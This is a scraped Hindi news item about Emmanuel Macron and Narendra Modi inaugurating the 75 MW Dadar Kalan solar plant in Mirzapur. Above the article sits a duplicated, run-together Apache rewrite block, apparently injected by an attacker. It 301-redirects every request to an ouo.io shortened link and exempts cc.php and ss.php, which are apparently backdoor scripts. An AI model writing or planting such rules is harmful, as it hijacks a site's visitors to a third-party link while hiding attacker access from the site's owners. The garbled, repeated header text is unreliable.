
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 954
Nextलखनऊ। भारत दौरे पर आए फ्रांस के राष्ट्रपति इमैनुएल मैक्रों के साथ प्रधानमंत्री नरेंद्र मोदी आज वाराणसी पहुंच गए हैं। इससे पहले प्रधानमंत्री मोदी और फ्रांस के राष्ट्रपति इमैनुएल मैक्रों ने मिर्जापुर पहुंचकर सौर ऊर्जा संयंत्र का उद्घाटन किया। राष्ट्रपति मैक्रों वाराणसी उतरने के बाद हेलिकॉप्टर से करीब 11 बजे मिर्जापुर पहुंचे। यहां वो पीएम मोदी के साथ छानवे ब्लाक स्थित दादर कला गांव में बने सौर ऊर्जा संयंत्र का उद्घाटन किया। यहां यूपी के मुख्यमंत्री योगी आदित्यनाथ उनकी अगवानी करेंगे।
आपको बता दें कि दादर कलां मे स्थापित सौर ऊर्जा परियोजना प्रदेश की सबसे बड़ी सौर ऊर्जा परियोजना है। 75 मेगावाट के इस सोलर प्लांट पर करीब 560 करोड़ रुपया खर्च हुआ है। इस संयत्र से रोजाना पांच लाख यूनिट बिजली उत्पादन का लक्ष्य है। जिससे करीब डेढ़ लाख परिवारों को बिजली मिल सकेगी। इस परियोजना की स्थापना उत्तर प्रदेश नवीन एवं नवीनीकरण ऊर्जा विकास अभिकरण नेडा और फ्रेंच कंपनी सोलर डायरेक्ट की ओर से की गई है। इसे नेशनल ग्रिड से जोड़ा जाएगा। ये संयंत्र करीब 388 एकड़ क्षेत्र में फैला हुआ है। यूपी के ऊर्जा मंत्री बृजेश पाठक ने बताया कि यह सोलर प्लांट उत्तर प्रदेश के लिए मिसाल होगा।